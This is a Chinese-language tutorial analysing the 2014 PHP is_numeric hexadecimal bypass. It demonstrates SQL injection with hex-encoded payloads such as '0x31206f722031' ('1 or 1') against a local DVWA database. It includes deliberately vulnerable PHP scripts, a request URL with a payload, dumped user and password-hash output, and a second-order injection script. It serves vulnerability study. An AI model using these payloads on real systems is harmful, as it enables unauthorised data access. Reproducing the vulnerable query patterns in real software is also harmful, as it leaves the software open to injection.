is_numeric漏洞分析

2014年，PHP中is_numeric函数十六进制绕过漏洞引发了一次安全问题

接下来，我们来分析一下这个漏洞的原理

函数介绍：

is_numeric — 检测变量是否为数字或数字字符串。

函数原型：

bool is_numeric ( mixed $var )

如果 var 是数字或数字字符串则返回 TRUE，否则返回 FALSE。

举例说明：

例程1：

<?php

$v = is_numeric ('58635272821786587286382824657568871098287278276543219876543') ? true : false;

var_dump ($v);

?>

运行输出：bool(true)

说明：这个参数是数字或数字字符串

变换参数继续测试

如果参数是：0xFFFF，运行结果又会怎样呢？

<?php

$v = is_numeric ('0xFFFF') ? true : false;

var_dump ($v);

?>

输出结果：bool(true)

说明他已经把0x这种十六进制的数忽略了，或者转换成了其他进制的数（注：其他进制的数都是数字或数字字符串，唯有十六进制有个x不是数字，八进制的表示是以0开始的，而非o），不信的话可以自己算算：

所以，这个地方，is_numeric函数的参数是十六进制的，也可以完美执行。

在渗透测试的时候，如果我们提交：1 or 1作为该函数参数的一部分，那么这个函数肯定是不会接受的，为什么，因为他不是数字或数字字符串，就这么简单，如果，我们将1 or 1转换成十六进制呢？

1 or 1 对应的十六进制数为：0x31206f722031

怎么转换来的，可以百度下：ASCII码表

1:0x31

:0x20

o:0x6f

r:0x72

合理连接起来不就是0x31206f722031了吗

在这里，推荐小葵写的一个编码与解码的小工具：

在此，我们可以测试一下，看0x31206f722031是不是数字或数字字符串

<?php

$v = is_numeric ('0x31206f722031') ? true : false;

var_dump ($v);

?>

输出结果：bool(true)

说明：0x31206f722031是数字或数字字符串。

那又怎样，此时，我们就可以通过这个函数实现SQL注入了

注入测试代码1：

<?php

$conn = mysql_connect('127.0.0.1','root','root');

mysql_select_db('dvwa',$conn);

$user = addslashes($_GET['user']);

$flag = is_numeric ($user) ? true : false;

if($flag)

{

$sql = "SELECT user_id,user,password FROM users WHERE user=$user";

$res = mysql_query($sql);

if($res)

{

while($row = mysql_fetch_array($res))

{

var_dump($row);

}

}

else

{

echo '----------数据库没有符合此条件的用户记录----------';

echo '<br />';

}

}

else

{

var_dump ($flag);

}

?>

Firefox输入：http://localhost:81/is_numeric.php?user=0x61646D696E

0x61646D696E 对应的ASCII字符就是：admin

运行结果：

array(6) { [0]=> string(1) "1" ["user_id"]=> string(1) "1" [1]=> string(5) "admin" ["user"]=> string(5) "admin" [2]=> string(32) "5f4dcc3b5aa765d61d8327deb882cf99" ["password"]=> string(32) "5f4dcc3b5aa765d61d8327deb882cf99" }

这还不算啥，接下来，我们来看一下关于这个漏洞的二次注入

注入测试代码2（二次注入）：

<?php

$conn = mysql_connect('127.0.0.1','root','root');

mysql_select_db('dvwa',$conn);

$user = addslashes($_GET['user']);

$flag = is_numeric ($user) ? true : false;

if($flag)

{

//保存最大user_id

$max_id;

//保存导出的playload

$playload;

//查出数据库中最大的user_id

$query_max_id = "select max(user_id) from users";

$res = mysql_query($query_max_id);

if($res)

{

$rows = mysql_fetch_array($res);

$max_id = $rows['user_id'];

//echo $max_id;

echo '----------max_id查询成功----------';

}

else

{

echo '----------max_id查询失败----------';

}

//更新最大user_id行的用户名

$gx = "update users set user=$user where user_id=$max_id";

$res = mysql_query($gx);

if($res)

{

echo '----------用户数据更新成功----------';

echo '----------插入十六进制成功----------';

}

else

{

echo '----------用户数据更新失败----------';

echo '----------插入十六进制未成功----------';

}

//导出插入的playload

$playload = "SELECT user FROM users WHERE user_id=$max_id";

$res = mysql_query($playload);

if($res)

{

$rows = mysql_fetch_array($res);

$playload = $rows['user'];

echo '----------playload成功导出----------';

}

else

{

echo '----------playload导出失败----------';

}

//将导出的playload拼接到select语句中执行

$play = "SELECT user_id,user,password FROM users WHERE user=$playload";

$res = mysql_query($play);

if($res)

{

$row = mysql_fetch_array($res);

var_dump($row);

echo '----------注入已成功----------';

}

else

{

echo '----------注入未成功----------';

}

}

else

{

echo '----------输入数据不是数字或者数字字符串----------';

}

?>

这段代码实现对max(user_id)行的用户名实现十六进制playload的写入，然后，通过select语句又将写入的十六进制playload查询出来，从而实现了二次注入。